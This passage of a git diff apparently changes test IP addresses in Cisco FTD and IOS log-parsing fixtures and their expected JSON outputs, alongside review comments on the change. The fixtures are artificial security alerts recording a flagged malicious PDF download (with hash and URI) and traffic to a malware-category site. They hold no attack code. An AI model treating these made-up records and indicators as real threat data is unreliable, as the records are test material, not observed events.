- "original": "2019-08-16T09:42:07Z firepower %FTD-1-430005: SrcIP: 10.0.1.20, DstIP: 18.197.225.123, SrcPort: 47926, DstPort: 80, Protocol: tcp, FileDirection: Download, FileAction: Malware Cloud Lookup, FileSHA256: 9a04a82eb19ad382f9e9dbafa498c6b4291f93cfe98d9e8b2915af99c06ffcd7, SHA_Disposition: Malware, SperoDisposition: Spero detection not performed on file, ThreatName: Pdf.Exploit.Pdfka::100.sbx.tg, ThreatScore: 100, FileName: dd3dee576d0cb4abfed00f97f0c71c1d, FileType: PDF, FileSize: 278987, ApplicationProtocol: HTTP, Client: cURL, User: No Authentication Required, FirstPacketSecond: 2019-08-16T09:42:06Z, FilePolicy: malware-and-file-policy, FileSandboxStatus: Failed to Send, URI: http://18.197.225.123/public/infected/dd3dee576d0cb4abfed00f97f0c71c1d",
+ "ingested": "2021-12-09T13:35:21.450211600Z",
+ "original": "2019-08-16T09:42:07Z firepower %FTD-1-430005: SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 47926, DstPort: 80, Protocol: tcp, FileDirection: Download, FileAction: Malware Cloud Lookup, FileSHA256: 9a04a82eb19ad382f9e9dbafa498c6b4291f93cfe98d9e8b2915af99c06ffcd7, SHA_Disposition: Malware, SperoDisposition: Spero detection not performed on file, ThreatName: Pdf.Exploit.Pdfka::100.sbx.tg, ThreatScore: 100, FileName: dd3dee576d0cb4abfed00f97f0c71c1d, FileType: PDF, FileSize: 278987, ApplicationProtocol: HTTP, Client: cURL, User: No Authentication Required, FirstPacketSecond: 2019-08-16T09:42:06Z, FilePolicy: malware-and-file-policy, FileSandboxStatus: Failed to Send, URI: http://81.2.69.144/public/infected/dd3dee576d0cb4abfed00f97f0c71c1d",
 "code": "430005",
 "kind": "alert",
 "start": "2019-08-16T09:42:06Z",
@@ -1111,9 +1111,9 @@
 "first_packet_second": "2019-08-16T09:42:06Z",
 "file_sandbox_status": "Failed to Send",
 "threat_score": "100",
- "uri": "http://18.197.225.123/public/infected/dd3dee576d0cb4abfed00f97f0c71c1d",
+ "uri": "http://81.2.69.144/public/infected/dd3dee576d0cb4abfed00f97f0c71c1d",
 "file_sha256": "9a04a82eb19ad382f9e9dbafa498c6b4291f93cfe98d9e8b2915af99c06ffcd7",
- "dst_ip": "18.197.225.123",
+ "dst_ip": "81.2.69.144",
 "file_size": "278987",
 "src_port": "47926",
 "src_ip": "10.0.1.20",
diff --git a/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-security-malware-site.log b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-security-malware-site.log
index 3caf6780a5c..65034c68c48 100644
--- a/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-security-malware-site.log
+++ b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-security-malware-site.log
@@ -1 +1 @@
-2020-03-01T01:02:36Z CISCO-SENSOR-3D Alerts %NGIPS-0-430003: DeviceUUID: 1c8ff662-08f3-11e4-85c0-bc960372972f, AccessControlRuleAction: Allow, AccessControlRuleReason: IP Monitor, SrcIP: 3.3.3.3, DstIP: 2.2.2.2, SrcPort: 65090, DstPort: 80, Protocol: tcp, IngressInterface: s1p1, EgressInterface: s1p2, IngressZone: Inside-DMZ-Interface-Inline, EgressZone: Inside-DMZ-Interface-Inline, ACPolicy: COOL-POLICY-3D, AccessControlRuleName: Inside DMZ-Rule-Inline, Prefilter Policy: Unknown, User: No Authentication Required, UserAgent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.87 Safari/537.36, Client: Chrome, ClientVersion: 80.0.3987.87, ApplicationProtocol: HTTP, ConnectionDuration: 20, InitiatorPackets: 4, ResponderPackets: 4, InitiatorBytes: 729, ResponderBytes: 246, NAPPolicy: State-Backbone, SecIntMatchingIP: Destination, IPReputationSICategory: Malware, HTTPReferer: http://eyedropper-color-pick.info/mk?c=1581483445764, ReferencedHost: eyedropper-color-pick.info, URL: http://bad-malwaresite-grr.info/favicon.ico
+2020-03-01T01:02:36Z CISCO-SENSOR-3D Alerts %NGIPS-0-430003: DeviceUUID: 1c8ff662-08f3-11e4-85c0-bc960372972f, AccessControlRuleAction: Allow, AccessControlRuleReason: IP Monitor, SrcIP: 81.2.69.144, DstIP: 81.2.69.144, SrcPort: 65090, DstPort: 80, Protocol: tcp, IngressInterface: s1p1, EgressInterface: s1p2, IngressZone: Inside-DMZ-Interface-Inline, EgressZone: Inside-DMZ-Interface-Inline, ACPolicy: COOL-POLICY-3D, AccessControlRuleName: Inside DMZ-Rule-Inline, Prefilter Policy: Unknown, User: No Authentication Required, UserAgent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.87 Safari/537.36, Client: Chrome, ClientVersion: 80.0.3987.87, ApplicationProtocol: HTTP, ConnectionDuration: 20, InitiatorPackets: 4, ResponderPackets: 4, InitiatorBytes: 729, ResponderBytes: 246, NAPPolicy: State-Backbone, SecIntMatchingIP: Destination, IPReputationSICategory: Malware, HTTPReferer: http://eyedropper-color-pick.info/mk?c=1581483445764, ReferencedHost: eyedropper-color-pick.info, URL: http://bad-malwaresite-grr.info/favicon.ico
diff --git a/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-security-malware-site.log-expected.json b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-security-malware-site.log-expected.json
index b7ea042807e..ba055f04e31 100644
--- a/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-security-malware-site.log-expected.json
+++ b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-security-malware-site.log-expected.json
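Review bot: The rewritten line gives SrcIP and DstIP the same address, 81.2.69.144, where the old line had two distinct hosts, so the expected output (the @@ -10 hunk of test-security-malware-site.log-expected.json) now carries byte-identical `source.geo` and `destination.geo` blocks and a one-element `related.ip`, and the test can no longer distinguish a source/destination swap in the pipeline from a correct run. Only the destination needs geo enrichment here (`SecIntMatchingIP: Destination`), so the source side could stay a non-enrichable private address, e.g. `SrcIP: 10.0.1.20` as the other FTD fixtures in this diff use, keeping 81.2.69.144 for DstIP alone. The same collapse happens with the IPv6 line in cisco-ios.log and test-cisco-ios.log, where 2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6 is now both the client and the SSH server of an ACL "permitted tcp" record; a second address from the supported set on one side would keep those fixtures discriminating too.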
@@ -10,43 +10,52 @@
 "destination": {
 "geo": {
 "continent_name": "Europe",
- "country_name": "France",
+ "region_iso_code": "GB-OXF",
+ "city_name": "Abingdon",
+ "country_iso_code": "GB",
+ "country_name": "United Kingdom",
+ "region_name": "Oxfordshire",
 "location": {
- "lon": 2.3387,
- "lat": 48.8582
- },
- "country_iso_code": "FR"
+ "lon": -1.3614,
+ "lat": 51.7095
+ }
 },
 "as": {
- "number": 3215,
+ "number": 20712,
 "organization": {
- "name": "Orange"
+ "name": "Andrews \u0026 Arnold Ltd"
 }
 },
- "address": "2.2.2.2",
+ "address": "81.2.69.144",
 "port": 80,
 "bytes": 246,
- "ip": "2.2.2.2",
+ "ip": "81.2.69.144",
 "packets": 4
 },
 "source": {
 "geo": {
- "continent_name": "North America",
- "region_iso_code": "US-WA",
- "city_name": "Seattle",
- "country_iso_code": "US",
- "country_name": "United States",
- "region_name": "Washington",
+ "continent_name": "Europe",
+ "region_iso_code": "GB-OXF",
+ "city_name": "Abingdon",
+ "country_iso_code": "GB",
+ "country_name": "United Kingdom",
+ "region_name": "Oxfordshire",
 "location": {
- "lon": -122.3451,
- "lat": 47.6348
+ "lon": -1.3614,
+ "lat": 51.7095
+ }
+ },
+ "as": {
+ "number": 20712,
+ "organization": {
+ "name": "Andrews \u0026 Arnold Ltd"
 }
 },
- "address": "3.3.3.3",
+ "address": "81.2.69.144",
 "port": 65090,
 "bytes": 729,
- "packets": 4,
- "ip": "3.3.3.3"
+ "ip": "81.2.69.144",
+ "packets": 4
 },
 "url": {
 "path": "/favicon.ico",
@@ -95,8 +104,7 @@
 "CISCO-SENSOR-3D"
 ],
 "ip": [
- "3.3.3.3",
- "2.2.2.2"
+ "81.2.69.144"
 ]
 },
 "host": {
@@ -110,8 +118,8 @@
 "event": {
 "severity": 0,
 "duration": 20000000000,
- "ingested": "2021-09-07T12:22:10.459282500Z",
- "original": "2020-03-01T01:02:36Z CISCO-SENSOR-3D Alerts %NGIPS-0-430003: DeviceUUID: 1c8ff662-08f3-11e4-85c0-bc960372972f, AccessControlRuleAction: Allow, AccessControlRuleReason: IP Monitor, SrcIP: 3.3.3.3, DstIP: 2.2.2.2, SrcPort: 65090, DstPort: 80, Protocol: tcp, IngressInterface: s1p1, EgressInterface: s1p2, IngressZone: Inside-DMZ-Interface-Inline, EgressZone: Inside-DMZ-Interface-Inline, ACPolicy: COOL-POLICY-3D, AccessControlRuleName: Inside DMZ-Rule-Inline, Prefilter Policy: Unknown, User: No Authentication Required, UserAgent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.87 Safari/537.36, Client: Chrome, ClientVersion: 80.0.3987.87, ApplicationProtocol: HTTP, ConnectionDuration: 20, InitiatorPackets: 4, ResponderPackets: 4, InitiatorBytes: 729, ResponderBytes: 246, NAPPolicy: State-Backbone, SecIntMatchingIP: Destination, IPReputationSICategory: Malware, HTTPReferer: http://eyedropper-color-pick.info/mk?c=1581483445764, ReferencedHost: eyedropper-color-pick.info, URL: http://bad-malwaresite-grr.info/favicon.ico",
+ "ingested": "2021-12-09T13:35:23.717443400Z",
+ "original": "2020-03-01T01:02:36Z CISCO-SENSOR-3D Alerts %NGIPS-0-430003: DeviceUUID: 1c8ff662-08f3-11e4-85c0-bc960372972f, AccessControlRuleAction: Allow, AccessControlRuleReason: IP Monitor, SrcIP: 81.2.69.144, DstIP: 81.2.69.144, SrcPort: 65090, DstPort: 80, Protocol: tcp, IngressInterface: s1p1, EgressInterface: s1p2, IngressZone: Inside-DMZ-Interface-Inline, EgressZone: Inside-DMZ-Interface-Inline, ACPolicy: COOL-POLICY-3D, AccessControlRuleName: Inside DMZ-Rule-Inline, Prefilter Policy: Unknown, User: No Authentication Required, UserAgent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.87 Safari/537.36, Client: Chrome, ClientVersion: 80.0.3987.87, ApplicationProtocol: HTTP, ConnectionDuration: 20, InitiatorPackets: 4, ResponderPackets: 4, InitiatorBytes: 729, ResponderBytes: 246, NAPPolicy: State-Backbone, SecIntMatchingIP: Destination, IPReputationSICategory: Malware, HTTPReferer: http://eyedropper-color-pick.info/mk?c=1581483445764, ReferencedHost: eyedropper-color-pick.info, URL: http://bad-malwaresite-grr.info/favicon.ico",
 "code": "430003",
 "kind": "event",
 "start": "2020-03-01T01:02:16.000Z",
@@ -140,9 +148,9 @@
 "responder_packets": "4",
 "access_control_rule_action": "Allow",
 "nap_policy": "State-Backbone",
- "dst_ip": "2.2.2.2",
+ "dst_ip": "81.2.69.144",
 "ac_policy": "COOL-POLICY-3D",
- "src_ip": "3.3.3.3",
+ "src_ip": "81.2.69.144",
 "protocol": "tcp",
 "application_protocol": "HTTP",
 "initiator_bytes": "729",
diff --git a/packages/cisco_ftd/manifest.yml b/packages/cisco_ftd/manifest.yml
index 08c6b50c00c..5401420f54b 100644
--- a/packages/cisco_ftd/manifest.yml
+++ b/packages/cisco_ftd/manifest.yml
@@ -1,7 +1,7 @@
 format_version: 1.0.0
 name: cisco_ftd
 title: Cisco FTD
-version: 1.2.0
+version: 1.2.1
 license: basic
 description: Collect logs from Cisco FTD with Elastic Agent.
 type: integration
diff --git a/packages/cisco_ios/_dev/deploy/docker/sample_logs/cisco-ios.log b/packages/cisco_ios/_dev/deploy/docker/sample_logs/cisco-ios.log
index 2b366c25af3..b8814e463d6 100644
--- a/packages/cisco_ios/_dev/deploy/docker/sample_logs/cisco-ios.log
+++ b/packages/cisco_ios/_dev/deploy/docker/sample_logs/cisco-ios.log
@@ -1,13 +1,13 @@
-Feb 8 04:00:48 198.51.100.2 585917: Feb 8 04:00:47.272: %SEC-6-IPACCESSLOGRP: list 177 denied igmp 198.51.100.197 -> 224.0.0.22, 1 packet
-Feb 9 04:00:48 198.51.100.2 585918: Feb 9 04:00:47.272: %SEC-6-IPACCESSLOGSP: list INBOUND-ON-F11 denied igmp 198.51.100.2 -> 224.0.0.2 (20), 1 packet
-Feb 10 04:00:48 198.51.100.2 585919: Feb 10 04:00:47.272: %SEC-6-IPACCESSLOGNP: list 171 denied 0 198.51.100.1 -> 255.255.255.255, 1 packet
-May 3 19:11:33 198.51.100.2 585920: May 3 19:11:32.619: %IPV6-6-ACCESSLOGP: list ACL-IPv6-E0/0-IN/10 permitted tcp 2001:DB8::3(1027) -> 2001:DB8:1000::1(22), 9 packets
-Jun 20 02:41:40 198.51.100.2 1663303: Jun 20 02:41:39.326: %SEC-6-IPACCESSLOGP: list 177 denied udp 198.51.100.195(55250) -> 198.51.100.255(15600), 1 packet
-Jun 20 02:41:45 198.51.100.2 1663304: Jun 20 02:41:44.921: %SEC-6-IPACCESSLOGDP: list 151 denied icmp 198.51.100.1 -> 198.51.100.2 (3/4), 1 packet
-Jun 20 02:42:28 198.51.100.2 1663312: Jun 20 02:42:27.342: %SEC-6-IPACCESSLOGP: list 177 denied udp 198.51.100.195(54309) -> 198.51.100.255(15600), 1 packet
-Jun 20 02:42:28 198.51.100.2 1663313: Jun 20 02:42:28.374: %SEC-6-IPACCESSLOGRL: access-list logging rate-limited or missed 18 packets
-Jun 20 02:42:34 198.51.100.2 1663314: Jun 20 02:42:33.340: %SEC-6-IPACCESSLOGP: list 177 denied udp 198.51.100.195(43989) -> 198.51.100.255(15600), 1 packet
-Jun 20 02:43:09 198.51.100.2 1663321: Jun 20 02:43:08.454: %SEC-6-IPACCESSLOGP: list 150 denied tcp 198.51.100.12(59832) -> 172.217.10.46(80), 1 packet
-Jun 20 02:43:29 198.51.100.2 1663325: Jun 20 02:43:28.403: %SEC-6-IPACCESSLOGRL: access-list logging rate-limited or missed 23 packets
-Jun 20 02:43:29 198.51.100.2 1663326: Jun 20 02:43:28.403: %SEC-6-IPACCESSLOGDP: list 150 denied icmp 198.51.100.12 -> 198.51.100.1 (3/3), 32 packets
-Jun 20 02:43:30 198.51.100.2 1663327: Jun 20 02:43:29.451: %SEC-6-IPACCESSLOGP: list 150 denied tcp 198.51.100.12(59834) -> 172.217.10.46(80), 1 packet
+Feb 8 04:00:48 192.168.100.2 585917: Feb 8 04:00:47.272: %SEC-6-IPACCESSLOGRP: list 177 denied igmp 192.168.100.197 -> 224.0.0.22, 1 packet
+Feb 9 04:00:48 192.168.100.2 585918: Feb 9 04:00:47.272: %SEC-6-IPACCESSLOGSP: list INBOUND-ON-F11 denied igmp 192.168.100.2 -> 224.0.0.2 (20), 1 packet
+Feb 10 04:00:48 192.168.100.2 585919: Feb 10 04:00:47.272: %SEC-6-IPACCESSLOGNP: list 171 denied 0 192.168.100.1 -> 255.255.255.255, 1 packet
+May 3 19:11:33 192.168.100.2 585920: May 3 19:11:32.619: %IPV6-6-ACCESSLOGP: list ACL-IPv6-E0/0-IN/10 permitted tcp 2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6(1027) -> 2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6(22), 9 packets
+Jun 20 02:41:40 192.168.100.2 1663303: Jun 20 02:41:39.326: %SEC-6-IPACCESSLOGP: list 177 denied udp 192.168.100.195(55250) -> 192.168.100.255(15600), 1 packet
+Jun 20 02:41:45 192.168.100.2 1663304: Jun 20 02:41:44.921: %SEC-6-IPACCESSLOGDP: list 151 denied icmp 192.168.100.1 -> 192.168.100.2 (3/4), 1 packet
+Jun 20 02:42:28 192.168.100.2 1663312: Jun 20 02:42:27.342: %SEC-6-IPACCESSLOGP: list 177 denied udp 192.168.100.195(54309) -> 192.168.100.255(15600), 1 packet
+Jun 20 02:42:28 192.168.100.2 1663313: Jun 20 02:42:28.374: %SEC-6-IPACCESSLOGRL: access-list logging rate-limited or missed 18 packets
+Jun 20 02:42:34 192.168.100.2 1663314: Jun 20 02:42:33.340: %SEC-6-IPACCESSLOGP: list 177 denied udp 192.168.100.195(43989) -> 192.168.100.255(15600), 1 packet
+Jun 20 02:43:09 192.168.100.2 1663321: Jun 20 02:43:08.454: %SEC-6-IPACCESSLOGP: list 150 denied tcp 192.168.100.12(59832) -> 81.2.69.144(80), 1 packet
+Jun 20 02:43:29 192.168.100.2 1663325: Jun 20 02:43:28.403: %SEC-6-IPACCESSLOGRL: access-list logging rate-limited or missed 23 packets
+Jun 20 02:43:29 192.168.100.2 1663326: Jun 20 02:43:28.403: %SEC-6-IPACCESSLOGDP: list 150 denied icmp 192.168.100.12 -> 192.168.100.1 (3/3), 32 packets
+Jun 20 02:43:30 192.168.100.2 1663327: Jun 20 02:43:29.451: %SEC-6-IPACCESSLOGP: list 150 denied tcp 192.168.100.12(59834) -> 81.2.69.144(80), 1 packet
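Review bot: The 198.51.100.0/24 addresses replaced throughout this hunk are RFC 5737 TEST-NET-2 documentation space, which no GeoIP database enriches, so moving them to 192.168.100.0/24 is not required by the "supported subset" motivation for the public addresses and costs a rewrite of every `community_id` in the expected JSON; the same substitution is made in test-cisco-ios.log. If the check that drove this PR also rejects documentation ranges, that is worth a sentence in the changelog entry so the next contributor does not reach for 198.51.100.x again; if it does not, keeping TEST-NET-2 for the device and LAN hosts preserves the "clearly fake" intent of those fixtures and limits the change to the two lines that carried real public addresses, e.g. `... denied tcp 198.51.100.12(59832) -> 81.2.69.144(80), 1 packet`.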
diff --git a/packages/cisco_ios/changelog.yml b/packages/cisco_ios/changelog.yml
index 50cdfad33be..11ff65eda30 100644
--- a/packages/cisco_ios/changelog.yml
+++ b/packages/cisco_ios/changelog.yml
@@ -1,4 +1,9 @@
 # newer versions go on top
+- version: "1.2.1"
+ changes:
+ - description: Change test public IPs to the supported subset
+ type: bugfix
+ link: https://github.com/elastic/integrations/pull/2327
 - version: "1.2.0"
 changes:
 - description: Add 8.0.0 version constraint
diff --git a/packages/cisco_ios/data_stream/log/_dev/test/pipeline/test-cisco-ios.log b/packages/cisco_ios/data_stream/log/_dev/test/pipeline/test-cisco-ios.log
index d52c0d7b1b8..17ba60830b8 100644
--- a/packages/cisco_ios/data_stream/log/_dev/test/pipeline/test-cisco-ios.log
+++ b/packages/cisco_ios/data_stream/log/_dev/test/pipeline/test-cisco-ios.log
@@ -1,19 +1,19 @@
-Feb 8 04:00:48 198.51.100.2 585917: Feb 8 04:00:47.272: %SEC-6-IPACCESSLOGRP: list 177 denied igmp 198.51.100.197 -> 224.0.0.22, 1 packet
-Feb 9 04:00:48 198.51.100.2 585918: Feb 9 04:00:47.272: %SEC-6-IPACCESSLOGSP: list INBOUND-ON-F11 denied igmp 198.51.100.2 -> 224.0.0.2 (20), 1 packet
-Feb 10 04:00:48 198.51.100.2 585919: Feb 10 04:00:47.272: %SEC-6-IPACCESSLOGNP: list 171 denied 0 198.51.100.1 -> 255.255.255.255, 1 packet
-May 3 19:11:33 198.51.100.2 585920: May 3 19:11:32.619: %IPV6-6-ACCESSLOGP: list ACL-IPv6-E0/0-IN/10 permitted tcp 2001:DB8::3(1027) -> 2001:DB8:1000::1(22), 9 packets
-Jun 20 02:41:40 198.51.100.2 1663303: Jun 20 02:41:39.326: %SEC-6-IPACCESSLOGP: list 177 denied udp 198.51.100.195(55250) -> 198.51.100.255(15600), 1 packet
-Jun 20 02:41:45 198.51.100.2 1663304: Jun 20 02:41:44.921: %SEC-6-IPACCESSLOGDP: list 151 denied icmp 198.51.100.1 -> 198.51.100.2 (3/4), 1 packet
-Jun 20 02:42:28 198.51.100.2 1663312: Jun 20 02:42:27.342: %SEC-6-IPACCESSLOGP: list 177 denied udp 198.51.100.195(54309) -> 198.51.100.255(15600), 1 packet
-Jun 20 02:42:28 198.51.100.2 1663313: Jun 20 02:42:28.374: %SEC-6-IPACCESSLOGRL: access-list logging rate-limited or missed 18 packets
-Jun 20 02:42:34 198.51.100.2 1663314: Jun 20 02:42:33.340: %SEC-6-IPACCESSLOGP: list 177 denied udp 198.51.100.195(43989) -> 198.51.100.255(15600), 1 packet
-Jun 20 02:43:09 198.51.100.2 1663321: Jun 20 02:43:08.454: %SEC-6-IPACCESSLOGP: list 150 denied tcp 198.51.100.12(59832) -> 172.217.10.46(80), 1 packet
-Jun 20 02:43:29 198.51.100.2 1663325: Jun 20 02:43:28.403: %SEC-6-IPACCESSLOGRL: access-list logging rate-limited or missed 23 packets
-Jun 20 02:43:29 198.51.100.2 1663326: Jun 20 02:43:28.403: %SEC-6-IPACCESSLOGDP: list 150 denied icmp 198.51.100.12 -> 198.51.100.1 (3/3), 32 packets
-Jun 20 02:43:30 198.51.100.2 1663327: Jun 20 02:43:29.451: %SEC-6-IPACCESSLOGP: list 150 denied tcp 198.51.100.12(59834) -> 172.217.10.46(80), 1 packet
-Mar 24 18:06:03 198.51.100.2 1991219: Mar 24 18:06:03.424 UTC: %SEC_LOGIN-5-LOGIN_SUCCESS: Login Success [user: john.smith] [Source: 10.2.55.3] [localport: 22] at 12:06:03 MST Wed Mar 24 2021
-Mar 24 18:06:00 198.51.100.2 1991220: Mar 24 18:06:00.364 UTC: %SYS-6-LOGOUT: User john.smith has exited tty session 5(10.5.36.9)
-Mar 24 17:37:39 198.51.100.2 1991221: Mar 24 17:37:39 UTC: %PIM-SW1-6-INVALID_RP_JOIN: Received (*, 10.36.2.78) Join from 10.4.5.66 for invalid RP 10.3.66.3
-Mar 24 17:37:39 198.51.100.2 1991221: Mar 24 17:37:39 UTC: %PIM-SW1-6-INVALID_RP_JOIN: Received (10.50.22.5, 10.36.2.78) Join from 10.4.5.66 for invalid RP 10.3.66.3
-Mar 24 12:09:35 198.51.100.2 1991217: Mar 24 12:09:35.367: %OSPF-4-NOVALIDKEY: No valid authentication send key is available on interface eth0
-Mar 24 12:06:47 198.51.100.2 1991218: Mar 24 12:06:47.099: %CCH323-6-CALL_PRESERVED: cch323_h225_handle_conn_loss: H.323 call preserved due to socket closure or error, Call Id = 6527, fd = 19
\ No newline at end of file
+Feb 8 04:00:48 192.168.100.2 585917: Feb 8 04:00:47.272: %SEC-6-IPACCESSLOGRP: list 177 denied igmp 192.168.100.197 -> 224.0.0.22, 1 packet
+Feb 9 04:00:48 192.168.100.2 585918: Feb 9 04:00:47.272: %SEC-6-IPACCESSLOGSP: list INBOUND-ON-F11 denied igmp 192.168.100.2 -> 224.0.0.2 (20), 1 packet
+Feb 10 04:00:48 192.168.100.2 585919: Feb 10 04:00:47.272: %SEC-6-IPACCESSLOGNP: list 171 denied 0 192.168.100.1 -> 255.255.255.255, 1 packet
+May 3 19:11:33 192.168.100.2 585920: May 3 19:11:32.619: %IPV6-6-ACCESSLOGP: list ACL-IPv6-E0/0-IN/10 permitted tcp 2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6(1027) -> 2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6(22), 9 packets
+Jun 20 02:41:40 192.168.100.2 1663303: Jun 20 02:41:39.326: %SEC-6-IPACCESSLOGP: list 177 denied udp 192.168.100.195(55250) -> 192.168.100.255(15600), 1 packet
+Jun 20 02:41:45 192.168.100.2 1663304: Jun 20 02:41:44.921: %SEC-6-IPACCESSLOGDP: list 151 denied icmp 192.168.100.1 -> 192.168.100.2 (3/4), 1 packet
+Jun 20 02:42:28 192.168.100.2 1663312: Jun 20 02:42:27.342: %SEC-6-IPACCESSLOGP: list 177 denied udp 192.168.100.195(54309) -> 192.168.100.255(15600), 1 packet
+Jun 20 02:42:28 192.168.100.2 1663313: Jun 20 02:42:28.374: %SEC-6-IPACCESSLOGRL: access-list logging rate-limited or missed 18 packets
+Jun 20 02:42:34 192.168.100.2 1663314: Jun 20 02:42:33.340: %SEC-6-IPACCESSLOGP: list 177 denied udp 192.168.100.195(43989) -> 192.168.100.255(15600), 1 packet
+Jun 20 02:43:09 192.168.100.2 1663321: Jun 20 02:43:08.454: %SEC-6-IPACCESSLOGP: list 150 denied tcp 192.168.100.12(59832) -> 81.2.69.144(80), 1 packet
+Jun 20 02:43:29 192.168.100.2 1663325: Jun 20 02:43:28.403: %SEC-6-IPACCESSLOGRL: access-list logging rate-limited or missed 23 packets
+Jun 20 02:43:29 192.168.100.2 1663326: Jun 20 02:43:28.403: %SEC-6-IPACCESSLOGDP: list 150 denied icmp 192.168.100.12 -> 192.168.100.1 (3/3), 32 packets
+Jun 20 02:43:30 192.168.100.2 1663327: Jun 20 02:43:29.451: %SEC-6-IPACCESSLOGP: list 150 denied tcp 192.168.100.12(59834) -> 81.2.69.144(80), 1 packet
+Mar 24 18:06:03 192.168.100.2 1991219: Mar 24 18:06:03.424 UTC: %SEC_LOGIN-5-LOGIN_SUCCESS: Login Success [user: john.smith] [Source: 10.2.55.3] [localport: 22] at 12:06:03 MST Wed Mar 24 2021
+Mar 24 18:06:00 192.168.100.2 1991220: Mar 24 18:06:00.364 UTC: %SYS-6-LOGOUT: User john.smith has exited tty session 5(10.5.36.9)
+Mar 24 17:37:39 192.168.100.2 1991221: Mar 24 17:37:39 UTC: %PIM-SW1-6-INVALID_RP_JOIN: Received (*, 10.36.2.78) Join from 10.4.5.66 for invalid RP 10.3.66.3
+Mar 24 17:37:39 192.168.100.2 1991221: Mar 24 17:37:39 UTC: %PIM-SW1-6-INVALID_RP_JOIN: Received (10.50.22.5, 10.36.2.78) Join from 10.4.5.66 for invalid RP 10.3.66.3
+Mar 24 12:09:35 192.168.100.2 1991217: Mar 24 12:09:35.367: %OSPF-4-NOVALIDKEY: No valid authentication send key is available on interface eth0
+Mar 24 12:06:47 192.168.100.2 1991218: Mar 24 12:06:47.099: %CCH323-6-CALL_PRESERVED: cch323_h225_handle_conn_loss: H.323 call preserved due to socket closure or error, Call Id = 6527, fd = 19
\ No newline at end of file
diff --git a/packages/cisco_ios/data_stream/log/_dev/test/pipeline/test-cisco-ios.log-expected.json b/packages/cisco_ios/data_stream/log/_dev/test/pipeline/test-cisco-ios.log-expected.json
index ac44d4da98f..83f9ae2f713 100644
--- a/packages/cisco_ios/data_stream/log/_dev/test/pipeline/test-cisco-ios.log-expected.json
+++ b/packages/cisco_ios/data_stream/log/_dev/test/pipeline/test-cisco-ios.log-expected.json
@@ -4,7 +4,7 @@
 "log": {
 "level": "informational",
 "source": {
- "address": "198.51.100.2"
+ "address": "192.168.100.2"
 }
 },
 "destination": {
@@ -13,15 +13,15 @@
 },
 "source": {
 "packets": 1,
- "address": "198.51.100.197",
- "ip": "198.51.100.197"
+ "address": "192.168.100.197",
+ "ip": "192.168.100.197"
 },
- "message": "list 177 denied igmp 198.51.100.197 -\u003e 224.0.0.22, 1 packet",
+ "message": "list 177 denied igmp 192.168.100.197 -\u003e 224.0.0.22, 1 packet",
 "tags": [
 "preserve_original_event"
 ],
 "network": {
- "community_id": "1:Rt5RGlrNED3cg8Wokm4+KGsDz+4=",
+ "community_id": "1:NCx7UOZoQUvxIB+uzqMmGnZTSzI=",
 "transport": "igmp",
 "type": "ipv4",
 "packets": 1
@@ -31,15 +31,15 @@
 },
 "related": {
 "ip": [
- "198.51.100.197",
+ "192.168.100.197",
 "224.0.0.22"
 ]
 },
 "event": {
 "severity": 6,
 "sequence": 585917,
- "ingested": "2021-09-07T07:59:38.898592100Z",
- "original": "Feb 8 04:00:48 198.51.100.2 585917: Feb 8 04:00:47.272: %SEC-6-IPACCESSLOGRP: list 177 denied igmp 198.51.100.197 -\u003e 224.0.0.22, 1 packet",
+ "ingested": "2021-12-09T13:35:26.832459800Z",
+ "original": "Feb 8 04:00:48 192.168.100.2 585917: Feb 8 04:00:47.272: %SEC-6-IPACCESSLOGRP: list 177 denied igmp 192.168.100.197 -\u003e 224.0.0.22, 1 packet",
 "code": "IPACCESSLOGRP",
 "provider": "firewall",
 "action": "deny",
@@ -57,7 +57,7 @@
 "log": {
 "level": "informational",
 "source": {
- "address": "198.51.100.2"
+ "address": "192.168.100.2"
 }
 },
 "destination": {
@@ -66,15 +66,15 @@
 },
 "source": {
 "packets": 1,
- "address": "198.51.100.2",
- "ip": "198.51.100.2"
+ "address": "192.168.100.2",
+ "ip": "192.168.100.2"
 },
- "message": "list INBOUND-ON-F11 denied igmp 198.51.100.2 -\u003e 224.0.0.2 (20), 1 packet",
+ "message": "list INBOUND-ON-F11 denied igmp 192.168.100.2 -\u003e 224.0.0.2 (20), 1 packet",
 "tags": [
 "preserve_original_event"
 ],
 "network": {
- "community_id": "1:gg8i3117u+0XZ7S0E0dl04HE4qw=",
+ "community_id": "1:eM790E01lXKYULfDPBPP0umazRw=",
 "transport": "igmp",
 "type": "ipv4",
 "packets": 1
@@ -87,15 +87,15 @@
 },
 "related": {
 "ip": [
- "198.51.100.2",
+ "192.168.100.2",
 "224.0.0.2"
 ]
 },
 "event": {
 "severity": 6,
 "sequence": 585918,
- "ingested": "2021-09-07T07:59:38.898643500Z",
- "original": "Feb 9 04:00:48 198.51.100.2 585918: Feb 9 04:00:47.272: %SEC-6-IPACCESSLOGSP: list INBOUND-ON-F11 denied igmp 198.51.100.2 -\u003e 224.0.0.2 (20), 1 packet",
+ "ingested": "2021-12-09T13:35:26.832466400Z",
+ "original": "Feb 9 04:00:48 192.168.100.2 585918: Feb 9 04:00:47.272: %SEC-6-IPACCESSLOGSP: list INBOUND-ON-F11 denied igmp 192.168.100.2 -\u003e 224.0.0.2 (20), 1 packet",
 "code": "IPACCESSLOGSP",
 "provider": "firewall",
 "action": "deny",
@@ -113,7 +113,7 @@
 "log": {
 "level": "informational",
 "source": {
